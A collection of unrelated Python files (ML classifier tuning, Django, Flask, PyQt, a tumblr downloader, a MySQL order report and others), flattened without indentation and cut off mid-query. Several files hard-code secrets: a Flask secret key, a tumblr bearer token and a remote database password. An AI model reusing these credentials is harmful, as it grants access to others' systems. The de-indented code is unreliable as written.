# list = ["France", "Belgium", "U.S.A", "China", "Russia"]
# for i in list:
# print(i)
#6
import random
list2 = [] |
# Load libraries
import pandas
from pandas.plotting import scatter_matrix
import matplotlib.pyplot as plt
from sklearn import model_selection
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
from sklearn.linear_model import Perceptron
from sklearn.svm import SVC
from sklearn.svm import NuSVC
from sklearn.neural_network import MLPClassifier
import numpy as np
# Load dataset
filename = "spambase.csv"
dataset = pandas.read_csv(filename,header=None)
# Split-out validation dataset
array = dataset.values
X = array[:,0:57] # 0:3 are the features, 4 is the class
Y = array[:,57]
validation_size = 0.20
seed = 7
scoring = 'accuracy' # ratio of correct predictions / total nr of instances
X_train, X_validation, Y_train, Y_validation = model_selection.train_test_split(X, Y, test_size=validation_size, random_state=seed)
# models = []
# # models.append(('SVM', SVC(C=3, shrinking=False)))
# models.append(('NN1', MLPClassifier(random_state=0)))
# models.append(('NN2', MLPClassifier(random_state=0,hidden_layer_sizes=(200,))))
# models.append(('NN3', MLPClassifier(random_state=0,activation='logistic')))
# models.append(('NN4', MLPClassifier(random_state=0,activation='tanh')))
# models.append(('NN5', MLPClassifier(random_state=0,alpha=0.001)))
# # evaluate each model in turn
# results = []
# names = []
# for name, model in models:
# kfold = model_selection.KFold(n_splits=10, random_state=seed)
# cv_results = model_selection.cross_val_score(model, X_train, Y_train, cv=kfold, scoring=scoring)
# results.append(cv_results)
# names.append(name)
# msg = "Validation error for %s: %f (%f)" % (name, cv_results.mean(), cv_results.std())
# print(msg)
# model.fit(X_train, Y_train)
# predictions = model.predict(X_validation)
# print('Test error is ' + str(accuracy_score(Y_validation, predictions)))
# print(confusion_matrix(Y_validation, predictions))
# print(classification_report(Y_validation, predictions))
# HERE
models = []
val_errors = []
names = []
cur_err = 0
cur_clf = MLPClassifier(random_state=0)
alphas = [0, 0.0001, 0.001, 0.01, 0.1, 1, 10]
act = ['identity', 'logistic', 'tanh', 'relu']
# alphas = [10, 100, 1000, 5000]
# reg = ['l2']
i = 0
for a in act:
for alp in alphas:
models.append(('NN'+str(i)+' '+a, MLPClassifier(random_state=0,activation=a,alpha=alp)))
i += 1
for name, model in models:
kfold = model_selection.KFold(n_splits=10, random_state=seed)
cv_results = model_selection.cross_val_score(model, X_train, Y_train, cv=kfold, scoring=scoring)
cv_err = cv_results.mean()
val_errors.append(cv_results)
#names.append(name)
msg = "%s: %f (%f)" % (name, cv_err, cv_results.std())
print(msg)
if cv_err > cur_err:
cur_err = cv_err
cur_clf = model
cur_clf.fit(X_train, Y_train)
predictions = cur_clf.predict(X_validation)
print('Best model is:')
print(cur_clf)
print('With an accuracy score of: ' + str(accuracy_score(Y_validation, predictions)))
print(confusion_matrix(Y_validation, predictions))
print(classification_report(Y_validation, predictions))
print('Nr of iterations: ' + str(cur_clf.n_iter_))
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('basic', '0029_auto_20160317_2257'),
]
operations = [
migrations.CreateModel(
name='Base',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(null=True, blank=True, max_length=50)),
('unique_key', models.CharField(null=True, blank=True, max_length=100, unique=True)),
],
options={
'verbose_name': 'Base Class',
},
),
migrations.DeleteModel(
name='Questions',
),
]
|
# -*- coding: utf-8 -*-
import unittest
import datetime
from pyboleto.bank.bradesco import BoletoBradesco
from testutils import BoletoTestCase
class TestBancoBradesco(BoletoTestCase):
def setUp(self):
self.dados = []
for i in range(3):
d = BoletoBradesco()
d.carteira = '06'
d.agencia_cedente = '278-0'
d.conta_cedente = '039232-4'
d.data_vencimento = datetime.date(2011, 2, 5)
d.data_documento = datetime.date(2011, 1, 18)
d.data_processamento = datetime.date(2011, 1, 18)
d.valor_documento = 8280.00
d.nosso_numero = str(2125525 + i)
d.numero_documento = str(2125525 + i)
self.dados.append(d)
def test_linha_digitavel(self):
self.assertEqual(self.dados[0].linha_digitavel,
'23790.27804 60000.212559 25003.923205 4 48690000828000'
)
def test_codigo_de_barras(self):
self.assertEqual(self.dados[0].barcode,
'23794486900008280000278060000212552500392320'
)
def test_agencia(self):
self.assertEqual(self.dados[0].agencia_cedente, '0278-0')
def test_conta(self):
self.assertEqual(self.dados[0].conta_cedente, '0039232-4')
def test_boleto_props(self):
props = self.dados[0].get_boleto_props()
self.assertEquals(len(props), 3)
self.assertEquals(props[0].name, 'agencia_cedente')
self.assertEquals(props[1].name, 'conta_cedente')
self.assertEquals(props[2].name, 'nosso_numero')
suite = unittest.TestLoader().loadTestsFromTestCase(TestBancoBradesco)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
import logging
from ProdAgentCore.Codes import errors
from ProdCommon.Database import Session
from ProdMgrInterface import MessageQueue
from ProdMgrInterface.Registry import registerHandler
from ProdMgrInterface.States.StateInterface import StateInterface
from ProdMgrInterface.States.Aux import HandleJobSuccess
import ProdMgrInterface.Interface as ProdMgrAPI
class QueuedMessages(StateInterface):
def __init__(self):
StateInterface.__init__(self)
def execute(self):
logging.debug("Executing state: QueuedMessages")
ignoreUrl={}
if not HandleJobSuccess.ms:
HandleJobSuccess.ms=self.ms
HandleJobSuccess.trigger = self.trigger
for report_type in ['ReportJobSuccess']:
start=0
amount=10
messages=MessageQueue.retrieve('ProdMgrInterface',report_type,start,amount)
while(len(messages)>0):
for message in messages:
if not ignoreUrl.has_key(message['server_url']):
MessageQueue.remove(message['id'])
result=HandleJobSuccess.sendMessage(message['server_url'],message['parameters'])
if result['url']=='failed':
ignoreUrl[message['server_url']]='failed'
message['parameters']['result']=result['result']
HandleJobSuccess.handleResult(message['parameters'])
logging.debug("Retrieve next message in queue")
start=start+amount
messages=MessageQueue.retrieve('ProdMgrInterface',report_type,start,amount)
logging.debug("Examined all messages in queue. Moving to next state")
registerHandler(QueuedMessages(),"QueuedMessages")
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
app = Flask(__name__)
app.config['SECRET_KEY']='57ba628bb0b13ce0c676dfde280ba245'
app.config['SQLALCHEMY_DATABASE_URI']='sqlite:///site2.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False
db=SQLAlchemy(app)
bcrypt=Bcrypt(app)
login_manager=LoginManager(app)
login_manager.login_view='login'
login_manager.login_message_category='info'
from flaskblog import routes |
# class A:
# def __init__(self):
# print "enter A"
# print "leave A"
# class B(A):
# def __init__(self):
# print "enter B"
# A.__init__(self)
# print "leave B"
class A(object):
def __init__(self):
print "enter A"
print "leave A"
class C(object):
def __init__(self):
print "enter C"
print "leave C"
class B(C):
def __init__(self):
print "enter B"
# A.__init__(self)
super(B, self).__init__()
print "leave B"
b = B()
|
import json
import numpy as np
import datetime
import pandas as pd
name = "Paul Millsap"
with open("./../data/player_monthly_PER.json") as fp:
data = json.load(fp)
date = list()
pers = list()
mt = range(1 , 13)
mt = map(lambda x : "%02d" % x , mt)
yt = range(2006 , 2017)
yt = map(str , yt)
result = dict()
for year in yt:
for month in mt:
#date.append(year + "-" + month)
#pers.append(data[name][year][month]["PER"])
if data[name][year][month]["PER"] == "NAN":
result[year + "-" + month] = "NaN"
else:
result[year + "-" + month] = data[name][year][month]["PER"]
df = pd.DataFrame(result.items(), columns=['month', '#Passengers'] , index = result.keys())
df.to_csv("test.csv")
|
#coding:utf8
import downloader
from translator import tr_
from utils import Soup, Session, query_url, get_max_range, Downloader, clean_title, update_url_query, get_print, get_ext, LazyUrl, urljoin, check_alive
import ree as re
import errors
from ratelimit import limits, sleep_and_retry
from error_printer import print_error
class Image:
def __init__(self, url, id, referer, p, cw=None):
self._url = url
self.id_ = id
self.p = p
self.cw = cw
self.url = LazyUrl(referer, self.get, self)
@sleep_and_retry
@limits(4, 1)
def get(self, _):
print_ = get_print(self.cw)
url = self._url
ext = get_ext(url)
if ext.lower()[1:] not in ['jpg', 'png', 'mp4']: #4645
print_('get_ext: {}, {}'.format(self.id_, url))
try:
ext = downloader.get_ext(url, referer=_)
except Exception as e: #3235
print_('Err: {}, {}\n'.format(self.id_, url)+print_error(e))
self.filename = '{}_p{}{}'.format(self.id_, self.p, ext)
return url
class Downloader_tumblr(Downloader):
type = 'tumblr'
URLS = ['tumblr.com']
MAX_CORE = 4
def init(self):
if 'tumblr.com/post/' in self.url:
raise errors.Invalid(tr_('개별 다운로드는 지원하지 않습니다: {}').format(self.url))
self.session = Session()
@classmethod
def fix_url(cls, url):
qs = query_url(url)
path = qs.get('redirect_to')
if path:
url = urljoin('https://tumblr.com', path[0])
id = get_id(url)
return 'https://{}.tumblr.com'.format(id)
def read(self):
username = get_id(self.url)
name = get_name(username, self.session)
for img in get_imgs(username, self.session, cw=self.cw):
self.urls.append(img.url)
self.title = clean_title('{} (tumblr_{})'.format(name, username))
class TumblrAPI:
_url_base = 'https://www.tumblr.com/api'
_hdr = {
'referer': 'https://www.tumblr.com',
'authorization': 'Bearer aIcXSOoTtqrzR8L8YEIOmBeW94c3FmbSNSWAUbxsny9KKx5VFh',
}
_qs = {
'fields[blogs]': 'name,avatar,title,url,is_adult,?is_member,description_npf,uuid,can_be_followed,?followed,?advertiser_name,is_paywall_on,theme,subscription_plan,?primary,share_likes,share_following,can_subscribe,subscribed,ask,?can_submit,?is_blocked_from_primary,?tweet,?admin,can_message,?analytics_url,?top_tags,paywall_access',
'npf': 'true',
'reblog_info': 'false',
'include_pinned_posts': 'false',
#'page_number': None,
}
def __init__(self, session, cw=None):
self.session = session
self.cw = cw
def print_(self, s):
get_print(self.cw)(s)
@sleep_and_retry
@limits(1, 1)
def call(self, path, qs, default_qs=True):
if default_qs:
qs_new = qs
qs = self._qs.copy()
qs.update(qs_new)
url = self._url_base + path
url = update_url_query(url, qs)
r = self.session.get(url, headers=self._hdr)
data = r.json()
errs = data.get('errors', [])
if errs:
code = int(errs[0]['code'])
if code == 0:
raise Exception('Not found')
elif code == 4012:
raise errors.LoginRequired(errs[0]['detail'])
r.raise_for_status()
return data['response']
def name(self, username):
path = '/v2/blog/{}/posts'.format(username)
data = self.call(path, {})
return data['blog']['title'] or data['blog']['name']
def posts(self, username):
path = '/v2/blog/{}/posts'.format(username)
qs = {}
ids = set()
default_qs = True
while True:
check_alive(self.cw)
data = self.call(path, qs, default_qs=default_qs)
for post in (post for post in data['posts'] if post['object_type'] != 'backfill_ad'):
id_ = post['id']
if id_ in ids:
self.print_('duplicate: {}'.format(id_))
continue
ids.add(id_)
url = 'https://{}.tumblr.com/post/{}'.format(username, id_)
yield Post(post, url, self.cw)
try:
links = data.get('links') or data['_links']
path_next = links['next']['href']
except:
path_next = None
if path_next:
path = path_next
default_qs = False
else:
break
class Post:
def __init__(self, data, url, cw=None):
id_ = data['id']
self.imgs = []
cs = data['content']
for trail in data['trail']:
cs += trail['content']
for c in cs:
if c['type'] in ['image', 'video']:
media = c.get('media')
if not media: #2859
continue
if isinstance(media, list):
media = media[0]
img = media['url']
self.imgs.append(Image(img, id_, url, len(self.imgs), cw))
elif c['type'] in ['text', 'link', 'audio']:
continue
else:
raise NotImplementedError(id_, c)
def get_name(username, session):
return TumblrAPI(session).name(username)
def get_imgs(username, session, cw=None):
print_ = get_print(cw)
artist = get_name(username, session)
imgs = []
error_count = 0
max_pid = get_max_range(cw)
api = TumblrAPI(session, cw)
for post in api.posts(username):
check_alive(cw)
imgs += post.imgs
s = '{} {} (tumblr_{}) - {}'.format(tr_('읽는 중...'), artist, username, len(imgs))
if cw:
cw.setTitle(s)
else:
print(s)
if len(imgs) > max_pid:
break
return imgs[:max_pid]
def get_id(url):
if '/dashboard/blog/' in url:
url = re.find('/dashboard/blog/([0-9a-zA-Z_-]+)', url)
if '/login_required/' in url:
url = url.split('/login_required/')[1].split('?')[0].split('/')[0]
if 'tumblr.com/blog/view/' in url:
url = url.split('tumblr.com/blog/view/')[1]
if 'tumblr.com' in url:
if 'www.tumblr.com' in url:
qs = query_url(url)
url = qs.get('url', [url])[0]
url = url.split('.tumblr.com')[0].split('/')[(-1)]
if url == 'www':
raise Exception('no id')
return url
|
from django.shortcuts import render
from .forms import ViewAvailableCourse
# Create your views here.
def view_course(request):
if request.method=="POST":
form=ViewAvailableCourse(request.POST)
if form.is_valid():
form.save()
else:
print(form.errors)
else:
form=ViewAvailableCourse()
return render (request,"view_course.html",{"form":form})
|
# -*- coding:utf-8 -*-
__author__ = 'gzs2473'
from PyQt4 import QtCore
from PyQt4 import QtGui
from ui.Ui_room import Ui_room_window
from table_widget import TableWidget
from play_window import PlayWindow
from custom_dialog import CustomDialog
class RoomWindow(CustomDialog, Ui_room_window):
send_signal = QtCore.pyqtSignal(dict)
enter_table_signal = QtCore.pyqtSignal(int)
def __init__(self, parent=None):
super(RoomWindow, self).__init__(parent)
self.table_num = -1 #记录当前用户在哪个桌子,-1表示不在任何桌子
#记录哪个桌子已经有人
self.tables = [([0] * 2) for i in range(16)]
self.setupUi(self)
self.__beautify()
self.__connect_slots()
###########################################################
#美化控件
###########################################################
def __beautify(self):
self.setTexture(u":/img/skin.png")
self.min_btn.setAutoDefault(False)
self.close_btn.setAutoDefault(False)
self.title_label.setFont(QtGui.QFont(u"微软雅黑", 9))
self.title_label.setText(u" 五子棋 made by 9527")
self.count_label.setFont(QtGui.QFont(u"微软雅黑", 9))
self.textBrowser.setFont(QtGui.QFont(u"微软雅黑", 9))
self.lineEdit.setFont(QtGui.QFont(u"微软雅黑", 9))
self.score_label.setFont(QtGui.QFont(u"微软雅黑", 9))
self.record_label.setFont(QtGui.QFont(u"微软雅黑", 9))
self.name_label.setFont(QtGui.QFont(u"微软雅黑", 11))
self.players_btn.setFont(QtGui.QFont(u"微软雅黑",8))
self.rank_btn.setFont(QtGui.QFont(u"微软雅黑",8))
self.players_btn.setText(u"玩家列表")
self.rank_btn.setText(u"排行榜")
self.rank_4.setFont(QtGui.QFont(u"华文行楷", 16))
self.rank_5.setFont(QtGui.QFont(u"华文行楷", 16))
self.rank_table.horizontalHeader().resizeSection(0, 180)
self.rank_table.setFont(QtGui.QFont(u"微软雅黑", 10))
self.stackedWidget.setCurrentIndex(0)
###########################################################
#连接信号与槽
###########################################################
def __connect_slots(self):
self.lineEdit.returnPressed.connect(self.__send_message)
self.min_btn.clicked.connect(self.showMinimized)
self.close_btn.clicked.connect(self.quit)
self.send_btn.clicked.connect(self.__send_message)
self.mapper = QtCore.QSignalMapper()
self.__init_tables(16)
self.mapper.mapped.connect(self.__enter_table)
self.players_btn.clicked.connect(self.__show_players)
self.rank_btn.clicked.connect(self.__show_rank)
def set_rank_list(self, items):
if not items: return
for i in range(5):
self.rank_table.setItem(i, 0, QtGui.QTableWidgetItem(items[i][0]))
self.rank_table.setItem(i, 1, QtGui.QTableWidgetItem(u"积分:%d" % items[i][1]))
@QtCore.pyqtSlot()
def __show_players(self):
self.stackedWidget.setCurrentIndex(0)
@QtCore.pyqtSlot()
def __show_rank(self):
self.stackedWidget.setCurrentIndex(1)
###########################################################
#添加游戏大厅里的桌子
#简单起见,只添加16个桌子
###########################################################
def __init_tables(self, num):
for i in xrange(num):
table_widget = TableWidget()
table_widget.setObjectName(u"table%d" % i)
table_widget.setStyleSheet(u"QWidget#table%d{background-image: url(:/img/tablen.bmp);}" % i)
self.gridLayout.addWidget(table_widget, i / 4, i % 4, 1, 1)
table_widget.left_btn.clicked.connect(self.mapper.map)
table_widget.right_btn.clicked.connect(self.mapper.map)
self.mapper.setMapping(table_widget.left_btn, i * 100 + 0)
self.mapper.setMapping(table_widget.right_btn, i * 100 + 1)
###########################################################
#进入赌桌
###########################################################
@QtCore.pyqtSlot(int)
def __enter_table(self, num):
#如果这个位置已经有人了
if self.tables[num / 100][num % 100]:
return
if self.table_num >= 0:
return
self.table_num = num
self.tables[num / 100][num % 100] = 1
msg = {
'sid': 2001,
'cid': 1001,
'table': num
}
self.play_window = PlayWindow(num)
self.play_window.close_btn.clicked.connect(self.__leave_table)
if self.tables[num / 100][1 - num % 100]:
self.play_window.is_white = 0
else:
self.play_window.is_white = 1
table_widget = self.findChild(TableWidget, u"table%d" % (num / 100))
if num % 100:
table_widget.right_btn.setStyleSheet(u"background-image:url(:/img/17-1.png);background-color:transparent;")
else:
table_widget.left_btn.setStyleSheet(u"background-image:url(:/img/17-1.png);background-color:transparent;")
self.send_signal.emit(msg)
self.enter_table_signal.emit(num)
###########################################################
#离开赌桌
###########################################################
@QtCore.pyqtSlot()
def __leave_table(self):
table_widget = self.findChild(TableWidget, u"table%d" % (self.table_num / 100))
if self.table_num % 100:
table_widget.right_btn.setStyleSheet(u"background-color:transparent;")
else:
table_widget.left_btn.setStyleSheet(u"background-color:transparent;")
self.tables[self.table_num / 100][self.table_num % 100] = 0
self.table_num = -1
###########################################################
#游戏大厅的聊天室功能
###########################################################
@QtCore.pyqtSlot()
def __send_message(self):
txt = self.lineEdit.text()
if txt == '':
return
self.lineEdit.clear()
self.textBrowser.append(u"<font color='red'>我 - 说:</>")
self.textBrowser.append(u" " + txt)
msg = {
'sid': 2002,
'cid': 1001,
'content': unicode(txt.toUtf8(), 'utf-8', 'ignore')
}
self.send_signal.emit(msg)
###########################################################
#退出大厅的时候,通知服务器离开
###########################################################
@QtCore.pyqtSlot()
def quit(self):
msg = {
'sid': 2000,
'cid': 1002,
}
self.send_signal.emit(msg)
self.close() |
def diagonalDifference(arr: list[list], size: int) -> int:
"""[summary]
Args:
arr (list[list]): [description]
size (int): [description]
Returns:
int: [description]
"""
d1 = 0
d2 = 0
for i in range(size):
for j in range(size):
if i == j:
d1 += arr[i][j]
if (i + j) == size - 1:
d2 += arr[i][j]
rst = abs(d1 - d2)
return rst
if __name__ == "__main__":
mtx = [[11, 2, 4], [4, 5, 6], [10, 8, -12]]
print(diagonalDifference(mtx, 3))
|
import unittest
from migrator import main
class TestMain(unittest.TestCase):
def test_parse_uri(self):
testcases = [
{
'uri': 'localhost',
'host': 'localhost',
'port': 6379,
'db': 0,
},
{
'uri': '192.168.192.41/1',
'host': '192.168.192.41',
'port': 6379,
'db': 1,
},
{
'uri': 'user-redis-cluster.example.com:6380',
'host': 'user-redis-cluster.example.com',
'port': 6380,
'db': 0,
},
{
'uri': 'user-redis-cluster.example.com:6380/2',
'host': 'user-redis-cluster.example.com',
'port': 6380,
'db': 2,
},
]
for tc in testcases:
host, port, db = main.parse_uri(tc['uri'])
self.assertEqual(host, tc['host'])
self.assertEqual(port, tc['port'])
self.assertEqual(db, tc['db'])
if __name__ == '__main__':
unittest.main()
|
from os.path import join
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from matplotlib.colors import ListedColormap
from .settings import *
class Figure:
"""
Base class for figures providing some common methods.
Attributes:
name (str) - figure name
directory (str) - default path for saving figure
fig (matplotlib.figure.Figure)
axes (matplotlib.axes.AxesSubplots)
"""
def __init__(self, name='unnamed', directory='../graphics'):
self.name = name
self.directory = directory
self.fig = None
@staticmethod
def create_figure(figsize=(3, 3)):
"""
Create blank figure.
Args:
figsize (tuple) - figure dimensions
"""
fig = plt.figure(figsize=figsize)
return fig
def add_axes(self, nrows=1, ncols=1):
"""
Add axes to figure.
Args:
nrows, ncols (int) - number of rows and columns
"""
self.axes = self.fig.subplots(nrows=nrows, ncols=ncols)
def save(self, **kwargs):
"""
Save figure to file.
Keyword Arguments:
fmt (str) - file format, eg 'pdf'
dpi (int) - resolution
transparent (bool) - if True, remove background
rasterized (bool) - if True, rasterize figure data
addtl kwargs: keyword arguments for plt.savefig
"""
self._save(self.fig, self.name, self.directory, **kwargs)
@staticmethod
def _save(fig,
name,
dirpath='./',
fmt='pdf',
dpi=300,
transparent=True,
rasterized=True,
**kwargs):
"""
Save figure to file.
Args:
fig (matplotlib.figures.Figure) - figure to be saved
name (str) - file name without format extension
dirpath (str) - directory in which to save file
fmt (str) - file format, eg 'pdf'
dpi (int) - resolution
transparent (bool) - if True, remove background
rasterized (bool) - if True, rasterize figure data
kwargs: keyword arguments for plt.savefig
"""
path = join(dirpath, name+'.{}'.format(fmt))
kw = dict(dpi=dpi, transparent=transparent, rasterized=rasterized)
fig.savefig(path, format=fmt, **kwargs)
def _add_markers(self, x, y, c, **kwargs):
"""
Add markers to axis.
Args:
x, y (array like) - marker x and y positions
c (array like) - marker colors
kwargs: keyword arguments for matplotlib.pyplot.scatter
"""
if len(self.fig.axes) == 0:
ax = self.fig.subplots()
ax = self.fig.axes[0]
# add markers to plot
ax.scatter(x, y, c=c, **kwargs)
def format(self, **kwargs):
""" Format all figure axes. """
for ax in self.fig.axes:
self.format_axis(ax, **kwargs)
def format_axis(self, ax):
""" Format individual axis. """
pass
class CellSelection(Figure):
"""
Visualize cell selection by overlaying cell position markers on top of an image of a single RGB layer.
Inherited attributes:
name (str) - figure name ('selection')
directory (str) - default path for saving figure
fig (matplotlib.figure.Figure)
axes (matplotlib.axes.AxesSubplots)
"""
def __init__(self, layer, data, channel='r', **kwargs):
"""
Instantiate cell selection figure.
Args:
layer (Layer) - RGB image layer
data (pd.DataFrame) - selected cell measurement data
channel (str) - color channel to be added
kwargs: keyword arguments for render
"""
Figure.__init__(self, name='selection')
self.render(layer, data, **kwargs)
def render(self, layer, data, channel='r', figsize=(3, 3)):
"""
Render figure.
Args:
layer (Layer) - RGB image layer
data (pd.DataFrame) - selected cell measurement data
channel (str) - color channel to be added
figsize (tuple) - figure dimensions
"""
# create figure
self.fig = self.create_figure(figsize)
self.add_axes()
# add image
self.add_image(layer, channel=channel)
# add cell position markers
self.add_markers(data)
def add_image(self, layer, channel='r'):
"""
Add scalar image to figure.
Args:
layer (Layer) - RGB image layer
channel (str) - color channel to be added
"""
_ = layer.get_channel(channel).show(ax=ax, segments=False, cmap=None)
_ = ax.axis('off')
def add_markers(self, data, color_by='genotype', xykey=None, **kwargs):
"""
Add cell position markers to axis.
Args:
data (pd.DataFrame) - selected cell measurement data
color_by (str) - cell measurement attribute used to color markers
xykey (list) - attribute keys for cell x/y positions
kwargs: keyword arguments for markers
"""
if xykey is None:
xykey = ['centroid_x', 'centroid_y']
# get cell coordinates and color vector
x, y = data[xykey].values.T
# get color vector and colormap
c = data[color_by]
cmap = ListedColormap(['y', 'c', 'm'], 'indexed', 3)
# add markers to plot
self._add_markers(x, y, c, cmap=cmap, vmin=0, vmax=2, **kwargs)
class Scatterplot(Figure):
"""
Scatter points in XY plane.
Attributes:
xvar, yvar (str) - cell measurement features to be scattered
Inherited attributes:
name (str) - figure name
directory (str) - default path for saving figure
fig (matplotlib.figure.Figure)
axes (matplotlib.axes.AxesSubplots)
"""
def __init__(self, data, xvar, yvar, name, **kwargs):
"""
Instantiate scatter plot.
Args:
data (pd.DataFrame) - selected cell measurement data
xvar, yvar (str) - cell measurement features to be scattered
name (str) - figure name
kwargs: keyword arguments for
"""
Figure.__init__(self, name=name)
self.xvar, self.yvar = xvar, yvar
self.render(data, **kwargs)
def render(self, data, figsize=(2, 2)):
"""
Render figure.
Args:
data (pd.DataFrame) - selected cell measurement data
figsize (tuple) - figure dimensions
"""
# create figure
self.fig = self.create_figure(figsize)
self.add_axes()
# add data
self._add_markers(data[self.xvar], data[self.yvar], c='k', s=1)
# format axes
self.format()
def format_axis(self, ax):
"""
Format axis.
Args:
ax (matplotlib.axes.AxesSubplot)
"""
_ = ax.spines['top'].set_visible(False)
_ = ax.spines['right'].set_visible(False)
_ = ax.set_xlabel(self.x)
_ = ax.set_ylabel(self.y)
class BackgroundCorrelation(Scatterplot):
"""
Plot correlated expression between red and green fluorescence channels.
Inherited attributes:
xvar, yvar (str) - cell measurement features to be scattered
name (str) - figure name
directory (str) - default path for saving figure
fig (matplotlib.figure.Figure)
axes (matplotlib.axes.AxesSubplots)
"""
def __init__(self, data, name, figsize=(2, 2)):
"""
Instantiate background correlation plot.
Args:
data (pd.DataFrame) - selected cell measurement data
name (str) - figure name
figsize (tuple) - figure size
"""
Scatterplot.__init__(self, data, 'r', 'g', name, figsize=figsize)
def format_axis(self, ax):
"""
Format axis.
Args:
ax (matplotlib.axes.AxesSubplot)
"""
_ = ax.spines['top'].set_visible(False)
_ = ax.spines['right'].set_visible(False)
_ = ax.set_xticks(np.arange(0, .95, .2))
_ = ax.set_yticks(np.arange(0, .95, .2))
_ = ax.set_xlabel('Nuclear RFP level')
_ = ax.set_ylabel('Nuclear GFP level')
|
# Author: Jaemin Jo <jmjo@hcil.snu.ac.kr>
import numpy as np
from pynene import Index
class KNNKernelDensity():
SQRT2PI = np.sqrt(2 * np.pi)
def __init__(self, X, online=False):
self.X = X
self.index = Index(X, w=(0.8, 0.2), reconstruction_weight=5)
if not online: # if offline
self.index.add_points(len(X))
def run(self, ops):
return self.index.run(ops)
def score_samples(self, X, k=10, bandwidth=0.2):
_, dists = self.index.knn_search_points(X, k=k)
scores = self._gaussian_score(dists, bandwidth) / k
return scores
def _gaussian_score(self, dists, bandwidth):
logg = -0.5 * (dists / bandwidth) ** 2
g = np.exp(logg) / bandwidth / self.SQRT2PI
return g.sum(axis=1)
|
from instapy import InstaPy
session = InstaPy(username='XXXXXXX', password='XXXXXXX',
headless_browser=False)
session.login()
session.unfollow_users(amount=1000,
allFollowing=True,
unfollow_after=0,
sleep_delay=601)
session.end()
|
# -*- coding:utf-8 -*-
# @Time : 2020/7/29
# @Author : Stephev
# @Site :
# @File : Payment.py
# @Software:
import pymysql
import csv
import datetime
#D:\workpalce\csv_file
now_time_r = datetime.datetime.now()
now_time = datetime.datetime.strftime(now_time_r,'%Y-%m-%d_%H_%M')
class cnMySQL:
def __init__(self):
self._dbhost = 'rm-bp1h051g0br862eswfo.mysql.rds.aliyuncs.com'
self._dbuser = 'python_dba'
self._dbpassword = 'Python_dba1'
self._dbname = 'uat_order'
self._dbcharset = 'utf8'
self._dbport = int(3306)
self._conn = self.connectMySQL()
if (self._conn):
self._cursor = self._conn.cursor(cursor=pymysql.cursors.DictCursor)
def connectMySQL(self):
try:
conn = pymysql.connect(host=self._dbhost,
user=self._dbuser,
passwd=self._dbpassword,
db=self._dbname,
port=self._dbport,
cursorclass=pymysql.cursors.DictCursor,
charset=self._dbcharset)
except Exception as e:
raise
#print("数据库连接出错")
conn = False
return conn
def close(self):
if (self._conn):
try:
if (type(self._cursor) == 'object'):
self._conn.close()
if (type(self._conn) == 'object'):
self._conn.close()
except Exception:
print("关闭数据库连接异常")
def ExecQuery(self,sql):
"""
执行查询语句
"""
res = ''
if (self._conn):
try:
self._cursor.execute(sql)
res = self._cursor.fetchall()
except Exception:
res = False
print("查询异常")
self.close()
return res
def noForward():
"""
写入还没有转交订单
"""
conn = cnMySQL()
no_forward = "select b.purchase_order_no 订单编号,\
case b.status\
when '2' then '待付款'\
when '3' then '待审核'\
when '4' then '审核失败'\
when '6' then '代发货'\
when '7' then '调货中'\
when '8' then '待收货'\
when '9' then '完成'\
when '10' then '已取消'\
else '其他' end as 订单状态,\
b.submit_time 订单提交时间,\
case b.target_type\
when '1' then '总部'\
when '2' then '代理'\
else '其他' end as 出货人类型,\
b.transfer_to 总部订单号,\
c.title 商品名称,\
c.goods_id 商品id,\
c.sku_desc 商品描述,\
c.sku_id skuid,\
c.num 单品购买数量,\
c.price 进货单价,\
c.total_fee 总金额,\
b.payment 实际付款总额,\
c.post_fee 运费,\
a.NAME 代理姓名,\
a.auth_code 授权码,\
case a.level_id\
when '1' then '分公司'\
when '2' then '合伙人'\
when '3' then '官方'\
when '4' then '省代'\
when '5' then '市代'\
when '6' then '会员'\
else '其他' end as 代理等级,\
a.id 买家id,\
case a.region_id\
when '1' then '笛梦大区'\
when '2' then '环球大区'\
when '3' then '辉煌大区'\
when '4' then '聚米大区'\
when '5' then '聚星大区'\
when '6' then '口口大区'\
when '7' then '米苏大区'\
when '8' then '野狼大区'\
when '9' then '海纳百川大区'\
when '10' then '红红大区'\
when '11' then '熊熊大区'\
when '12' then '飞越大区'\
when '13' then '测试大区'\
else '其他' end as 进货人所属大区\
from uat_user.renren_distributor a,\
uat_order.rupt_purchase_order b,\
uat_order.rupt_purchase_order_item c\
where a.id = b.source_id and b.purchase_order_no = c.purchase_order_no and b.pay_type = 2 and b.submit_time >= '2020-07-28 00:00:00' and b.is_transfer = 0;"
noresult = conn.ExecQuery(no_forward)
print(noresult)
noforward_csv = "D:\\workpalce\\csv_file\\"+now_time+".csv"
headers = ['订单编号','订单状态','订单提交时间','出货人类型','总部订单号','商品名称','商品id','商品描述','skuid','单品购买数量','进货单价','总金额',\
'实际付款总额','运费','代理姓名','授权码','代理等级','买家id','进货人所属大区']
with open(noforward_csv,'w',newline='') as f:
f_csv = csv.DictWriter(f,headers)
f_csv.writeheader()
f_csv.writerows(noresult)
f.close()
return
def isForward():
"""
已转交订单,查找其总部订单号
"""
rows = []
conn = cnMySQL()
no_forward = "select b.purchase_order_no 订单编号,\
case b.status\
when '2' then '待付款'\
when '3' then '待审核'\
when '4' then '审核失败'\
when '6' then '代发货'\
when '7' then '调货中'\
when '8' then '待收货'\
when '9' then '完成'\
when '10' then '已取消'\
else '其他' end as 订单状态,\
b.submit_time 订单提交时间,\
case b.target_type\
when '1' then '总部'\
when '2' then '代理'\
else '其他' end as 出货人类型,\
b.transfer_to 总部订单号,\
c.title 商品名称,\
c.goods_id 商品id,\
c.sku_desc 商品描述,\
c.sku_id skuid,\
c.num 单品购买数量,\
c.price 进货单价,\
c.total_fee 总金额,\
b.payment 实际付款总额,\
c.post_fee 运费,\
a.NAME 代理姓名,\
a.auth_code 授权码,\
case a.level_id\
when '1' then '分公司'\
when '2' then '合伙人'\
when '3' then '官方'\
when '4' then '省代'\
when '5' then '市代'\
when '6' then '会员'\
else '其他' end as 代理等级,\
